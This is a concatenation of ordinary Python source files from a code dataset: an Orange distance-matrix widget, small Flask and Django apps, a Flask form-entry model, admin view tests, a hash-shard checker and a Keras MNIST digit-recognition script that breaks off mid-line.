(\"Manhattan\", orange.ExamplesDistanceConstructor_Manhattan),\n## (\"Hamming\", orange.ExamplesDistanceConstructor_Hamming)]\n self.metrics = [(\"Manhattan\", distManhattan), (\"Euclidean\", distEuclidean), (\"1 - (Pearson correlation coefficient)\", distPearson), (\"1 - (Spearman rank correlation coefficient)\", distSpearman)]\n\n # GUI\n self.mainArea.setFixedWidth(0)\n # Info box\n box = QVGroupBox(\"Info\", self.controlArea)\n self.infoa = QLabel('No data on input.', box)\n self.infob = QLabel('', box)\n OWGUI.separator(self.controlArea)\n\n # Distance metrics selection\n items = [x[0] for x in self.metrics]\n OWGUI.comboBox(self.controlArea, self, \"Metrics\", box=\"Distance Metrics\", items=items,\n tooltip=\"Metrics to measure distance between data sets.\",\n callback=self.onMetricsChange)\n\n self.resize(384, 138)\n \n\n ##########################################################################\n # handling of input/output signals\n\n## def computeDistance(self, d1, d2, dist):\n## \"\"\"employs orange to compute distances (slower)\n## \"\"\"\n## d = 0\n## for i in range(len(d1)):\n## d += dist(d1[i], d2[i])\n## d = d / len(d1)\n## return d\n\n def computeDistance(self, d1, d2):\n \"\"\"employs MA to cumpute distances (faster)\n \"\"\"\n return dist(d1.toNumpyMA(\"a\")[0], d2.toNumpyMA(\"a\")[0])\n\n\n def computeMatrix(self):\n if not self.data:\n self.send(\"Distance Matrix\", None)\n return\n## if self.Metrics == 0: # bug in orange, correct (remove normalize) once it is fixed\n## dist = self.metrics[self.Metrics][1](self.data[0], normalize=0)\n## else:\n## dist = self.metrics[self.Metrics][1](self.data[0]) \n matrix = orange.SymMatrix(len(self.data))\n matrix.setattr('items', self.data)\n self.progressBarInit()\n pbStep = 100./(len(self.data)**2/2. - len(self.data)/2.)\n for i in range(len(self.data)-1):\n for j in range(i+1, len(self.data)):\n## matrix[i, j] = self.computeDistance(self.data[i], self.data[j], dist)\n matrix[i, j] = self.metrics[self.Metrics][1](MA.ravel(self.data[i].toNumpyMA(\"a\")[0]), MA.ravel(self.data[j].toNumpyMA(\"a\")[0]))\n self.progressBarAdvance(pbStep)\n self.progressBarFinished()\n self.send(\"Distance Matrix\", matrix)\n\n\n def chipdata(self, data):\n self.data = []\n if data:\n self.infob.setText(\"\")\n numFiles = reduce(lambda a,b: a+len(b[1]), data, 0)\n lenSD = len(data)\n self.infoa.setText(\"%d set%s, total of %d data file%s.\" % (lenSD, [\"\",\"s\"][lenSD!=1], numFiles, [\"\",\"s\"][numFiles!=1]))\n numExamplesList = []\n # construct a list of ExampleTable lengths and a list of attribute names\n for (name, etList) in data:\n for et in etList:\n setattr(et,\"dirname\",name)\n setattr(et,\"strain\",name)\n self.data.append(et)\n numExamplesList.append(len(et))\n if len(self.data)>1:\n # test that files contain the same attributes and equal number of examples\n attrSorted = self.data[0].domain.attributes\n attrSorted.sort()\n numEx = len(self.data[0])\n for et in self.data[1:]:\n attrSorted2 = et.domain.attributes\n attrSorted2.sort()\n if map(lambda x: x.name, attrSorted) != map(lambda x: x.name, attrSorted2):\n self.data = []\n self.infob.setText(\"Error: data files contain different attributes, aborting distance computation.\")\n return\n if len(et) != numEx:\n self.data = []\n self.infob.setText(\"Error: data files contain unequal number of examples, aborting distance computation.\")\n return\n # compute distances\n pb = OWGUI.ProgressBar(self, iterations=len(self.data))\n self.computeMatrix()\n pb.finish()\n\n else:\n self.data = []\n self.infob.setText('Error: not enough data, aborting distance computation.')\n else:\n self.infoa.setText('No data on input.')\n\n\n def onMetricsChange(self):\n if self.data and len(self.data)>1:\n self.computeMatrix()\n\n\n\n###########################################################################\n# Distance Metrics\n###########################################################################\n\ndef distManhattan(x,y):\n \"\"\"normalized Manhattan distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n sumWeights = MA.add.reduce(MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.add.reduce(MA.absolute(x-y)) / sumWeights\n\n\ndef distManhattanW(x,y,w):\n \"\"\"normalized weighted Manhattan distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n sumWeights = MA.add.reduce(w * MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.add.reduce(w * MA.absolute(x-y)) / sumWeights\n\n\ndef distEuclidean(x,y):\n \"\"\"normalized euclidean distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n sumWeights = MA.add.reduce(MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.sqrt(MA.add.reduce((x-y)**2) / sumWeights)\n\n\ndef distEuclideanW(x,y,w):\n \"\"\"normalized weighted euclidean distance\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n sumWeights = MA.add.reduce(w * MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y))).astype(Numeric.Float))\n return MA.sqrt(MA.add.reduce(w * (x-y)**2) / sumWeights)\n\n\ndef distPearson(x,y):\n \"\"\"distance corresponding to 1 - pearson's correlation coefficient for arrays x,y\n returns distance: 1 - pearson_r\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n cond = MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)))\n return 1 - statc.pearsonr(MA.compress(cond,x).tolist(), MA.compress(cond,y).tolist())[0]\n\n\ndef distPearsonW(x,y,w):\n \"\"\"weighted distance corresponding to 1 - pearson's correlation coefficient for arrays x,y and weights w\n returns distance: 1 - pearson_r\n \"\"\"\n #TINY = 1.0e-20\n # ones for non-masked places at x,y and w\n x = MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n mask = MA.logical_or(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)), MA.getmaskarray(w))\n # set mask to w that is equal to the mask from x, y and w\n w = MA.masked_array(w, mask=mask)\n n_w_mean = MA.add.reduce(w) # n * mean(w)\n x_w = x*w # x * w\n y_w = y*w # y * w\n x_wmean = MA.divide(MA.add.reduce(x_w), n_w_mean) # weighted_mean(x)\n y_wmean = MA.divide(MA.add.reduce(y_w), n_w_mean) # weighted_mean(x) \n r_num = MA.add.reduce(x*y*w) - n_w_mean*x_wmean*y_wmean\n r_den = MA.sqrt((MA.add.reduce(x_w*x) - n_w_mean*x_wmean**2) * (MA.add.reduce(y_w*y) - n_w_mean*y_wmean**2))\n return 1 - MA.divide(r_num, r_den)\n\n\ndef distSpearman(x,y):\n \"\"\"distance corresponding to 1 - spearman's correlation coefficient for arrays x,y\n returns distance: 1 - spearman_r\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n assert MA.rank(x) == MA.rank(y) == 1\n cond = MA.logical_not(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)))\n return 1 - statc.spearmanr(MA.compress(cond,x).tolist(), MA.compress(cond,y).tolist())[0]\n\ndef distSpearmanW(x,y,w):\n \"\"\"weighted distance corresponding to 1 - spearman's correlation coefficient for arrays x,y and weights w\n returns distance: 1 - spearman_r\n \"\"\"\n distSpearFunc = _distSpearmanW_NU\n for var in (x,y,w):\n if type(var) == MA.array and MA.count(var) != Numeric.multiply.reduce(var.shape):\n distSpearFunc = _distSpearmanW_MA\n break\n return distSpearFunc(x,y,w)\n\n\ndef _distSpearmanW_NU(x,y,w):\n \"\"\"x,y,w must be Numeric\n \"\"\"\n x = Numeric.asarray(x)\n y = Numeric.asarray(y)\n w = Numeric.asarray(w)\n assert Numeric.rank(x) == Numeric.rank(y) == Numeric.rank(w) == 1\n rankx = Numeric.array(statc.rankdata(x.tolist()))\n ranky = Numeric.array(statc.rankdata(y.tolist()))\n return distPearsonW(rankx,ranky,w)\n\n\ndef _distSpearmanW_MA(x,y,w):\n \"\"\"if any of x,y,w is a MA array containing masked values\n \"\"\"\n x = MA.asarray(x)\n y = MA.asarray(y)\n w = MA.asarray(w)\n assert MA.rank(x) == MA.rank(y) == MA.rank(w) == 1\n cond = MA.logical_not(MA.logical_or(MA.logical_or(MA.getmaskarray(x), MA.getmaskarray(y)), MA.getmaskarray(w))) \n # with MA use compress before tolist() !\n rankx = Numeric.array(statc.rankdata(MA.compress(cond, x).tolist()))\n ranky = Numeric.array(statc.rankdata(MA.compress(cond, y).tolist()))\n return distPearsonW(rankx,ranky,MA.compress(cond,w))\n\n###########################################################################\n# testing\n###########################################################################\n\nif __name__==\"__main__\":\n import OWDataFiles, orngSignalManager\n signalManager = orngSignalManager.SignalManager(0)\n a=QApplication(sys.argv)\n ow=OWDataDistance(signalManager = signalManager)\n signalManager.addWidget(ow)\n a.setMainWidget(ow)\n ow.show()\n ds = OWDataFiles.OWDataFiles(signalManager = signalManager)\n signalManager.addWidget(ds)\n ds.loadData(\"potato.sub100\")\n signalManager.setFreeze(1)\n signalManager.addLink(ds, ow, 'Structured Data', 'Structured Data', 1)\n signalManager.setFreeze(0)\n a.exec_loop()\n ow.saveSettings()\n","sub_path":"widgets/prototypes/OWDataDistance.py","file_name":"OWDataDistance.py","file_ext":"py","file_size_in_byte":11512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97685187","text":"from django.urls import path\nfrom selection.views import show_floors, show_floors_details, show_all_offices, show_offices_details, show_zones, show_zones_details_by_floor\n\napp_name = 'selection'\n\nurlpatterns = [\n path('floors', show_floors, name='all_floors'),\n path('floors//', show_floors_details, name='floor_details'),\n path('offices', show_all_offices, name='all_offices'),\n path('offices//', show_offices_details, name='office_details'),\n path('zones', show_zones, name='all_zones'),\n path('zones//', show_zones_details_by_floor, name='zones_by_floor'),\n]\n","sub_path":"selection/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"123436359","text":"from flask import Flask, render_template, request, redirect, flash, make_response, session\nimport random\napp= Flask(__name__)\napp.secret_key=\"SECRET\"\n\n@app.route('/')\ndef index():\n if 'message' not in session:\n session['message']=\"\"\n if 'count' not in session:\n session['count']=5\n if 'res' not in session:\n session['res']=\"none\"\n if 'number' not in session:\n session['number'] = random.randint(1,101)\n return render_template('index.html', message = session['message'] , res=session['res'], cou=int(session['count']))\n\n@app.route('/submit', methods=['post'])\ndef guess():\n if int(request.form['guess'])>session['number'] and session['count']>0:\n session['message']='Too high'\n session['res']=\"red\"\n session['count']-=1\n elif int(request.form['guess'])0:\n session['message']='Too Low'\n session['res']=\"red\"\n session['count']-=1\n elif int(request.form['guess'])==session['number']:\n session['message']= \"congrats\"\n session['res']=\"green\"\n else: \n session['message']=\"out of guesses\"\n return redirect(\"/\")\n\n@app.route('/reset')\ndef reset():\n session['number']\n session.pop('number')\n session.pop('message')\n session['res']=\"none\"\n session['count'] =5\n return redirect(\"/\")\n\n# @app.route('/diff', methods=['post'])\n# def choose_dif():\n# dif = request.form()\n# if request.form['easy'] == 'easy':\n# session['count']=30\n# if request.form['med']=='med':\n# session['count']=15\n# if request.form['hard']=='hard':\n# session['count']=5\n# return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"number_game/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190929269","text":"import json\nfrom flask import Flask, flash, redirect, render_template, request, session, abort\nimport webbrowser,threading\n\ndef start_flask(link_recs):\n\n app = Flask(__name__)\n\n @app.route(\"/\")\n def index():\n return render_template(\n 'cold_start2.html',saved_recs=link_recs)\n\n\n threading.Timer(1.25, lambda: webbrowser.open('http://127.0.0.1:5084/')).start()\n app.run(port=5084)\n\nif __name__ == \"__main__\":\n\n saved_recs = json.load(open('link_recs.txt'))\n start_flask(saved_recs)\n","sub_path":"cold_start_flask.py","file_name":"cold_start_flask.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"581756905","text":"# Create a function that changes specific words into emoticons. \n# Given a sentence as a string, replace the words smile, grin, \n# sad and mad with their corresponding emoticons.\n\n# emotify(\"Make me smile\") ➞ \"Make me :D\"\n\n# emotify(\"Make me grin\") ➞ \"Make me :)\"\n\n# emotify(\"Make me sad\") ➞ \"Make me :(\"\n\ndef emotify(txt):\n\tface = {\n\t\t'smile': ':D', 'grin': ':)', 'sad': ':(', 'mad':':P'\n\t\t\n\t}\n\tfor f in face.keys():\n\t\tif f in txt:\n\t\t\ttxt = txt.replace(f, face[f])\n\treturn txt","sub_path":"emotifysentence.py","file_name":"emotifysentence.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280115941","text":"#!/usr/bin/env python\n\nimport argparse\nimport hashlib\nimport logging\nimport os\nimport sys\n\nimport yaml\n\nclass Checker(object):\n def __init__(self, config):\n self.config = config\n\n hasher = hashlib.new(self.config['hash'])\n self.hash_size = hasher.digest_size\n\n def _hash_path(self, partial):\n hasher = hashlib.new(self.config['hash'])\n hasher.update(partial)\n digest = hasher.hexdigest()\n\n logging.debug('hashed %s to %s', partial, digest)\n\n return digest\n\n def _path_in_shard_range(self, path, range_cfg):\n obj_hash = self._hash_path(path)\n hash_int = long(obj_hash, 16)\n\n ldelim = long(str(range_cfg[0]).ljust(self.hash_size * 2, str(range_cfg[0])[-1]), 16)\n if hash_int < ldelim:\n return False\n\n rdelim = long(str(range_cfg[1]).ljust(self.hash_size * 2, str(range_cfg[1])[-1]), 16)\n if hash_int > rdelim:\n return False\n\n return True\n\n def check(self):\n for shard_cfg in self.config['shards']:\n for i_root, i_dir, i_files in os.walk(shard_cfg['path']):\n rel_path = i_root[len(shard_cfg['path']):]\n\n # skip .git folders in the raws\n if rel_path == '/.git' or rel_path.startswith('/.git/'):\n continue\n\n for f in i_files:\n rel_with_file = rel_path + '/' + f\n if not self._path_in_shard_range(rel_with_file, shard_cfg['range']):\n loging.warning('file \"%s\" not in expected shard', rel_with_file)\n\ndef main():\n cli = argparse.ArgumentParser(description='Process some integers.')\n cli.add_argument('-c', '--config', dest='config', required=True, help='config file')\n cli_params = cli.parse_args()\n\n if not os.path.isfile(cli_params.config):\n raise Exception('invalid config file', cli_params.config)\n\n with open(cli_params.config, 'r') as fp:\n config = yaml.load(fp)\n\n log = logging.getLogger()\n log.setLevel(getattr(logging, config['log_level'].upper()))\n stderr_log_handler = logging.StreamHandler(sys.stderr)\n stderr_log_handler.setFormatter(logging.Formatter(datefmt='%Y-%m-%d %H:%M:%S', fmt='%(asctime)s [%(levelname)s] %(message)s'))\n log.addHandler(stderr_log_handler)\n\n obj = Checker(config)\n obj.check()\n\nif __name__ == '__main__':\n main()\n","sub_path":"check_balance.py","file_name":"check_balance.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32018197","text":"import json\n\nclass Entry:\n\n\tdef __init__(self, form, g):\n\t\tself.error = None\n\n\t\tself.author_id = g.user['id']\n\t\t# fetch basic forms\n\t\tself.name = form['name']\n\t\tself.descr = form['descr']\n\t\tself.version = form['version']\n\t\tself.site = form['site']\n\t\tself.tags = form['tags']\n\n\t\t# fetch contact\n\t\tself.contact = form['contact']\n\t\tif self.contact == 'Use my username':\n\t\t\tself.contact = g.user['username']\n\t\t\tself.contact_me = 1\n\t\telif self.contact == 'Other':\n\t\t\tself.contact = form['contact_other_txt']\n\t\t\tself.contact_me = 0\n\n\t\t# fetch dependency\n\t\ttry: \n\t\t\tself.dependency = form['dependency']\n\t\t\tself.dependency_other = 0\n\t\t\tif self.dependency == 'Yes':\n\t\t\t\t# self.depenency_other = 0\n\t\t\t\tself.dependency = form['dependency_yes_txt']\n\t\t\telif self.dependency == 'Other':\n\t\t\t\tself.dependency_other = 1\n\t\t\t\tself.dependency = form['dependency_other_txt']\n\t\texcept: self.error = 'Please select the dependencies your software has!'\n\n\t\t# fetch operating systems\n\t\tself.os = form.getlist('os')\n\t\tif \"Other\" in self.os:\n\t\t\tself.os_other = 1\n\t\t\tself.os.insert(0, form['os_other_txt'])\n\t\telse:\n\t\t\tself.os_other = 0\n\t\t# we use json.dumps because self.os is a list but we need a string\n\t\tself.os = json.dumps(self.os)\n\n\t\t# fee marking\n\t\tself.fee_academic = self.get_fee('fee_academic', form)\n\t\tself.fee_nonprofit = self.get_fee('fee_nonprofit', form)\n\t\tself.fee_govt = self.get_fee('fee_govt', form)\n\t\tself.fee_commercial = self.get_fee('fee_commercial', form)\n\n\tdef __getitem__(self, arg):\n\t\treturn getattr(self, arg)\n\n\t# returns 0 if there's no fee; else 1\n\tdef get_fee(self, name, form):\n\t\ttry: return 0 if form[name] == 'Free' else 1\n\t\texcept: return -1\n\n\t# returns any applicable errors\n\tdef get_error(self):\n\t\terror = None\n\t\tif self.error:\n\t\t\terror = self.error\n\t\telif not self.name:\n\t\t\terror = 'Please name your entry!'\n\t\telif not self.version:\n\t\t\terror = 'Please enter a version!'\n\t\telif not self.descr:\n\t\t\terror = 'Please provide a description of your software!'\n\t\telif len(self.descr) > 1024:\n\t\t\terror = 'Please provide a shorter description of your software!'\n\t\telif not self.tags:\n\t\t\terror = 'Please enter some key phrases to describe your software!'\n\t\telif len(self.tags.splitlines()) < 3:\n\t\t\terror = 'Please enter more phrases to describe your software!'\n\t\telif self.os == json.dumps([]):\n\t\t\terror = 'Please select the operating systems your software supports!'\n\t\telif not self.dependency:\n\t\t\terror = 'Please select the dependencies your software has!'\n\t\telif (self.fee_academic == -1 or self.fee_nonprofit == -1 or\n\t\t\tself.fee_govt == -1 or self.fee_commercial == -1):\n\t\t\terror = 'Please finish your fees section!'\n\t\t\n\t\treturn error\n\n\t# inserts this entry into the database\n\tdef insert(self, db):\n\t\tdb.execute(\n\t\t\t'INSERT INTO post'\n\t\t\t' (author_id, name, contact, contact_me, version, site, descr, tags,'\n\t\t\t' dependency, dependency_other, os, os_other, fee_academic, fee_nonprofit,'\n\t\t\t' fee_govt, fee_commercial)'\n\t\t\t' VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',\n\t\t\t(self.author_id, self.name, self.contact, self.contact_me, self.version, self.site, \n\t\t\tself.descr, self.tags, self.dependency, self.dependency_other, self.os, self.os_other,\n\t\t\tself.fee_academic, self.fee_nonprofit, self.fee_govt, self.fee_commercial)\n\t\t)\n\t\tdb.commit()\n\n\t# updates this entry in the database\n\tdef update(self, db, id, g):\n\t\t# we need to check if it's an admin editing, since\n\t\t# their username shouldn't overwrite the original one\n\t\tif g.user['admin'] == 1 and self.contact_me:\n\t\t\tcontact = db.execute(\n\t\t\t\t'SELECT contact FROM post WHERE id = ?',\n\t\t\t\t(id, )\n\t\t\t).fetchone()['contact']\n\t\telse:\n\t\t\tcontact = self.contact\n\n\t\tdb.execute(\n\t\t\t'UPDATE post SET'\n\t\t\t' name = ?, contact = ?, contact_me = ?, version = ?, site = ?, descr = ?, tags = ?,'\n\t\t\t' dependency = ?, dependency_other = ?, os = ?, os_other = ?, fee_academic = ?,'\n\t\t\t' fee_nonprofit = ?, fee_govt = ?, fee_commercial = ?'\n\t\t\t' WHERE id = ?',\n\t\t\t(self.name, contact, self.contact_me, self.version, self.site, self.descr, self.tags,\n\t\t\tself.dependency, self.dependency_other, self.os, self.os_other, self.fee_academic, \n\t\t\tself.fee_nonprofit, self.fee_govt, self.fee_commercial, id)\n\t\t)\n\t\tdb.commit()\n","sub_path":"flaskr/entrydata.py","file_name":"entrydata.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"267011766","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom mock import Mock\nfrom pyramid import httpexceptions\nfrom pyramid.testing import DummyRequest\nimport pytest\n\nfrom h.admin.views import admins as views\n\n\n@pytest.mark.usefixtures('routes')\nclass TestAdminsIndex(object):\n def test_when_no_admins(self):\n request = DummyRequest()\n\n result = views.admins_index(request)\n\n assert result[\"admin_users\"] == []\n\n @pytest.mark.usefixtures('users')\n def test_context_contains_admin_usernames(self):\n request = DummyRequest()\n\n result = views.admins_index(request)\n\n assert set(result[\"admin_users\"]) == set([\"agnos\", \"bojan\", \"cristof\"])\n\n\n@pytest.mark.usefixtures('users', 'routes')\nclass TestAdminsAddRemove(object):\n\n def test_add_makes_users_admins(self, users):\n request = DummyRequest(params={\"add\": \"eva\"})\n\n views.admins_add(request)\n\n assert users['eva'].admin\n\n def test_add_is_idempotent(self, users):\n request = DummyRequest(params={\"add\": \"agnos\"})\n\n views.admins_add(request)\n\n assert users['agnos'].admin\n\n def test_add_redirects_to_index(self):\n request = DummyRequest(params={\"add\": \"eva\"})\n\n result = views.admins_add(request)\n\n assert isinstance(result, httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n def test_add_redirects_to_index_when_user_not_found(self):\n request = DummyRequest(params={\"add\": \"florp\"})\n\n result = views.admins_add(request)\n\n assert isinstance(result, httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n def test_add_flashes_when_user_not_found(self):\n request = DummyRequest(params={\"add\": \"florp\"})\n request.session.flash = Mock()\n\n views.admins_add(request)\n\n assert request.session.flash.call_count == 1\n\n def test_remove_makes_users_not_admins(self, users):\n request = DummyRequest(params={\"remove\": \"cristof\"})\n\n views.admins_remove(request)\n\n assert not users['cristof'].admin\n\n def test_remove_is_idempotent(self, users):\n request = DummyRequest(params={\"remove\": \"eva\"})\n\n views.admins_remove(request)\n\n assert not users['eva'].admin\n\n def test_remove_will_not_remove_last_admin(self, users):\n views.admins_remove(DummyRequest(params={\"remove\": \"cristof\"}))\n views.admins_remove(DummyRequest(params={\"remove\": \"bojan\"}))\n views.admins_remove(DummyRequest(params={\"remove\": \"agnos\"}))\n\n assert users['agnos'].admin\n\n def test_remove_redirects_to_index(self):\n request = DummyRequest(params={\"remove\": \"agnos\"})\n\n result = views.admins_remove(request)\n\n assert isinstance(result, httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n def test_remove_redirects_to_index_when_user_not_found(self):\n request = DummyRequest(params={\"remove\": \"florp\"})\n\n result = views.admins_remove(request)\n\n assert isinstance(result, httpexceptions.HTTPSeeOther)\n assert result.location == '/adm/admins'\n\n\n@pytest.fixture\ndef users(db_session):\n from h import models\n\n admins = ['agnos', 'bojan', 'cristof']\n nonadmins = ['david', 'eva', 'flora']\n\n users = {}\n\n for admin in admins:\n users[admin] = models.User(username=admin,\n email=admin + '@example.com',\n password='secret',\n admin=True)\n for nonadmin in nonadmins:\n users[nonadmin] = models.User(username=nonadmin,\n email=nonadmin + '@example.com',\n password='secret')\n\n db_session.add_all(list(users.values()))\n db_session.flush()\n\n return users\n\n\n@pytest.fixture\ndef routes(config):\n config.add_route('admin_admins', '/adm/admins')\n","sub_path":"tests/h/admin/views/admins_test.py","file_name":"admins_test.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"514249735","text":"#Coder: Tran Duy Thanh\r\n#Email: thanhtd@uel.edu.vn\r\n#Phone: 0987773061\r\n#Blog for self-study: https://duythanhcse.wordpress.com\r\n#Facebook for solving coding problem: https://www.facebook.com/groups/communityuni\r\n#Description:\r\n #These codes I improved from Exercise 36\r\n # Number recognition program using Keras (deep learning)\r\n # In this practice, I use and update some functions:\r\n # 1. Using TensorFlow backend\r\n # 2. Using MNIST dataset\r\n # 3. Build model using Keras\r\n # 4. Write function to convert physical image to array vector\r\n # 5. Run model and predict function to regcognize the number\r\n # 6. Use pyplot to show processing and predict result\r\n # 7.Test some cases to recognize number\r\n#Step 1. Import some necessarily library\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.utils import np_utils\r\nfrom keras.datasets import mnist\r\nimport cv2\r\n\r\n# Step 2. Load MNIST Dataset\r\n#Load data from the MNIST dataset, including 60,000 training sets and 10,000 test sets.\r\n# Then divide the training set to 2 parts: 50,000 for training set and 10,000 data for validation set.\r\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\r\nX_val, y_val = X_train[50000:60000,:], y_train[50000:60000]\r\nX_train, y_train = X_train[:50000,:], y_train[:50000]\r\n#print to see data\r\nprint(X_train.shape)\r\n\r\n# Step 3. Reshape the data to the correct size required by keras\r\n# Input data for the Convolutional Neural Network model is a 4-dimensional tensor (N, W, H, D),\r\n#in this MNIST dataset is a grayscale image so W = H = 28, D = 1,\r\n#N is the number of images for each training session.\r\n#Because the image data above has the size of (N, 28, 28) ie (N, W, H)\r\n#so need to reshape to N 28 28 * 1 size to match the size required by keras.\r\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1)\r\nX_val = X_val.reshape(X_val.shape[0], 28, 28, 1)\r\nX_test = X_test.reshape(X_test.shape[0], 28, 28, 1)\r\n\r\n# Step 4. One hot encoding label (Y)\r\n#This step converts the one-hot encoding label Y of the example\r\n#image number 5 into a vector [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\r\nY_train = np_utils.to_categorical(y_train, 10)\r\nY_val = np_utils.to_categorical(y_val, 10)\r\nY_test = np_utils.to_categorical(y_test, 10)\r\n#print result to see\r\nprint('Original data y', y_train[0])\r\nprint('y after one-hot encoding ',Y_train[0])\r\n\r\n# Step 5. Model definition\r\n#1.Model = Sequential() to tell keras that we will layer layers on top of each other to create models.\r\n# Example input -> CONV -> POOL -> CONV -> POOL -> FLATTEN -> FC -> OUTPUT\r\n#2.In the first layer, We need to specify the input_shape of the image, input_shape = (W, H, D),\r\n# we use grayscale image size (28.28) so input_shape = (28, 28, 1)\r\n#3.When adding a Convolutional Layer, we need to specify the parameters: K (number of layers),\r\n# kernel size (W, H), activation function to use.\r\n# structure: model.add(Conv2D(K, (W, H), activation='function_name_activation'))\r\n#4.When adding a Maxpooling Layer, specify the size of the kernel, model.add(MaxPooling2D(pool_size=(W, H)))\r\n#5.Flatten step from tensor to vector just add flatten layer.\r\n#6.To add Fully Connected Layer (FC) need to specify the number of nodes in the layer and the activation\r\n# function used in the layer, structure: model.add(Dense(number_node_activation='activation_function_name'))\r\n\r\nmodel = Sequential()\r\n\r\n# Add Convolutional layer with 32 kernels, kernel size 3*3\r\n# use sigmoid function as activation and specify input_shape for first layer\r\nmodel.add(Conv2D(32, (3, 3), activation='sigmoid', input_shape=(28, 28, 1)))\r\n\r\n# Add Convolutional layer\r\nmodel.add(Conv2D(32, (3, 3), activation='sigmoid'))\r\n\r\n# Add Max pooling layer\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n# Flatten layer convert from tensor to vector\r\nmodel.add(Flatten())\r\n\r\n# Add Fully Connected layer with 128 nodes and use sigmoid . function\r\nmodel.add(Dense(128, activation='sigmoid'))\r\n\r\n# Output layer with 10 nodes and use softmax function to convert to probability.\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\n# Step 6. Compile model, specify which loss_function to use, method\r\n# is used to optimize the loss function.\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\n# Step 7. Train model with data\r\nH = model.fit(X_train, Y_train, validation_data=(X_val, Y_val),\r\n batch_size=32, epochs=10, verbose=1)\r\n\r\n# Step 8. Plot loss, accuracy of training set and validation set\r\nfig = plt.figure()\r\nnumOfEpoch = 10\r\nplt.plot(np.arange(0, numOfEpoch), H.history['loss'], label='training loss')\r\nplt.plot(np.arange(0, numOfEpoch), H.history['val_loss'], label='validation loss')\r\nplt.plot(np.arange(0, numOfEpoch), H.history['accuracy'], label='accuracy')\r\nplt.plot(np.arange(0, numOfEpoch), H.history['val_accuracy'], label='validation accuracy')\r\nplt.title('Accuracy and Loss')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('Loss|Accuracy')\r\nplt.legend()\r\n\r\n# Step 9. Model evaluation with test set data\r\nscore = model.evaluate(X_test, Y_test, verbose=0)\r\n#print result to see\r\nprint(score)\r\n#[0.033531852066516876, 0.9901999831199646]\r\n# We will use the evaluation result of the mode with the test set to make the final result of the model.\r\n# That is, our model predicts digits with 99% accuracy with the MNIST dataset.\r\n# That is, predicting about 100 images will be wrong by 1 image.\r\n\r\n# Step 10. Number prediction\r\n# create conv_image_to_data function to convert image file to array 28x28\r\ndef conv_image_to_data(filename):\r\n img_array = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)\r\n\r\n img_pil = Image.fromarray(img_array)\r\n img_28x28 = np.array(img_pil.resize((28, 28), Image.ANTIALIAS))\r\n\r\n img_array = (img_28x28.flatten())\r\n\r\n img_array = img_array.reshape(-1,1).T\r\n\r\n return img_array\r\n#call conv_image_to_data to test image digit-5.png\r\ndata=conv_image_to_data(\"data_exercise37\\digit-1.png\")\r\n#show image into chart\r\nplt.imshow(data.reshape(28,28), cmap='Blues')\r\n#call predict function\r\ny_predict = model.predict(data.reshape(1,28,28,1))\r\n#get number recognition and show into title of Chart\r\nplt.title('Predict number is 